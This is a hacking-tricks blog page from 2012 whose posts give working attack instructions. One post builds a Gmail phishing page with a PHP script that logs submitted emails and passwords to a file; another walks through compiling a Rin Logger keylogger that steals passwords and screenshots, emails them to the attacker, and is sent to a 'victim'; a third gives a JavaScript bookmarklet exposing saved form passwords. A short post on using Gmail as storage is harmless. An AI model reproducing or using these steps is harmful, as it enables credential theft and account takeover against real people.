welcome

Have a new tricks fun of world!
Showing posts with label ip hacking. Show all posts
Showing posts with label ip hacking. Show all posts

Saturday, 16 June 2012

Example how to create gmail phishing page.




Step 1.
Go to
http://gmail.com
Click File>Save Page As... or Ctrl+ S and save page.


Once you saved, rename ServiceLogin.htm to index.htm so when you upload it to a web
host and someone goes to your link, the index page is the first page that
shows up.

Step 2.
Open text editor and add this code:
PHP Code:
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle fopen("logs.txt""a");
foreach($_POST as $variable => $value) {
 fwrite($handle$variable);
 fwrite($handle"=");
 fwrite($handle$value);
 fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>
Save it as mail.php

Now create simple text document and name it logs.txt
Open logs.txt and this:

Code:
ltmpl=default
ltmplcache=2
continue=http://mail.google.com/mail/?
service=mail
rm=false
Email=victim@gmail.com
Passwd=victimpassword
rmShown=1
signIn=Sign in

Step 3.
Open index.htm with text editor and find this line:
Change it to this and save it:
PHP Code:
 <form id="gaia_loginform" action="mail.php" method="post"

Step 4.
By now you will have 4files
Upload them all to your hosting
And you are done!

Use Gmail as a Hard Drive



 Gmail Drive creates a virtual file system around your Google Mail account, allowing you to use Gmail as a storage medium.


Gspace
 Gspace is a Firefox plugin that allows you to use your Gmail account for online storage. File extensions are not an issue; you can upload any type of file which includes music files to stream directly with this Firefox extension.

Hack Gmail Account password with Key Logger



First Download Rin Logger from http://goo.gl/ruV2J Run the keylogger file on your pc and click on “Create new

Now, enter the information as follows: Email address: your email address (gmail recommended) Account Password: Password of your Email address. Keylogger Recipients: Enter your Email address
Click on next

Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs. After that hit "verify now” If you get a message saying verified, your good to go, click next

Now enable the “Install Keylogger” by clicking on it. Name the file anything you want and select Installation path as “Application Data”, click next

Click on Next
Now, “Enable Website Viewer” by clicking on it.
 Click on Next option.
Now, Enable the “Enable File Binder”.
Click on next.

Now Enable the “Steal Password
Click on Next

Fill all the information by yourself.
And click on next.

Now, hit on “Save As” and select the location where you want to save your keylogger server file. And click on “Compile Server”. Now Compile has been done.

You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.

How to View Hidden Password behind



 **** You can use this script when someone has checked the remember me button in the login form of any website and to reveal password from that saved asterisk or encrypted password. After opening the web page paste the JavaScript given below in the address bar and hit enter


javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if %20(s)%20alert(%22Passwords%20in%20forms%20on%20this %20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();